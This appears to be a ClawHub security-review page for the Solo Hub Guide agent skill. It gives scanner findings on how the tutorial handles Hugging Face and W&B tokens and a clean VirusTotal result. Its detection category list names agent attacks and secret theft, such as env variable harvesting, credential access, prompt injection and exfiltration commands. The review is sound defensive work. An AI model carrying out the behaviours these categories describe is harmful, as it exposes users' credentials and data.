ClawHub

Solo Hub Guide

Security checks across malware telemetry and agentic risk

Overview

This is a human-guided Solo Hub tutorial skill; it can walk users through purchases and optional API-token entry, but the behavior is disclosed, user-controlled, and not executable by the agent.

Install only if you intend to use Solo Hub workflows. Review any billing, credit purchases, plan upgrades, team roles, and training launches before confirming them. If you enable Hugging Face or W&B integrations, treat tokens as secrets: enter them only in the real Solo Hub UI, use the minimum required scope, avoid pasting them into chat or screenshots, and rotate/revoke them if exposed.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
  • Privilege EscalationExcessive Permissions, Sudo/Root Execution, Credential Access
  • Supply ChainUnpinned Dependencies, External Script Fetching, Obfuscated Code
  • Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
Findings (3)

Missing User Warnings

Medium
Confidence
94% confidence
Finding
The manifest instructs users to enter sensitive HuggingFace and W&B API tokens but does not explicitly warn that these are secrets requiring careful handling. In an agent-skill context, omission of a sensitivity warning increases the chance that tokens are pasted into logs, chats, screenshots, shared recordings, or other insecure channels, which could enable unauthorized model publishing, data access, or telemetry account misuse.

Missing User Warnings

Medium
Confidence
93% confidence
Finding
The tutorial explicitly instructs users to enter HuggingFace and Weights & Biases tokens into the UI but does not warn them to handle those credentials securely, verify they are entering them only into the trusted Solo Hub interface, or use least-privilege/scoped tokens. In an agent-skill context, prompting for secrets without clear safety guidance increases the risk of credential exposure, overscoped token use, and accidental disclosure through screenshots, logs, or untrusted interfaces.

Missing User Warnings

Medium
Confidence
95% confidence
Finding
The tutorial explicitly instructs users to enter HuggingFace and Weights & Biases API tokens but provides no safety guidance about secret handling, scope minimization, or avoiding exposure in shared environments. In an agent-skill context, normalizing token entry without warning increases the chance users paste long-lived credentials into the wrong UI, expose them during screen sharing, or use overly privileged tokens that could be abused if intercepted or stored insecurely.

VirusTotal

63/63 vendors flagged this skill as clean.

View on VirusTotal